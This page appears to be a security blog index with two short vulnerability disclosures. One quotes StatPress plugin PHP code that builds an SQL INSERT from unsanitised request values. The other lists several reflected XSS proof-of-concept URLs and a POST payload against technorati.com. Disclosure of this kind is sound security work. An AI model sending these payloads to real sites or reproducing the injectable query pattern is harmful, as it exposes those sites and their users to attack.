StatPress/StatPress Reloaded – SQL Injections

iriStatAppend() // URL (requested) $urlRequested = iri_StatPress_URL(); … $referrer = (isset($_SERVER[‘HTTP_REFERER’]) ? htmlentities($_SERVER[‘HTTP_REFERER’]) : ”); … $insert = “INSERT INTO ” . $table_name . ” (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) ” . “VALUES (‘$vdate’,’$vtime’,’$ipAddress’,’$urlRequested’,'” . addslashes(strip_tags($userAgent)) . “‘,’$referrer’,'” READ MORE

Technorati XSS

If anyone is interested, Technorati is full of bugs like this. http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E http://www.technorati.com/404please%27);alert(1);// http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E [POST]http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser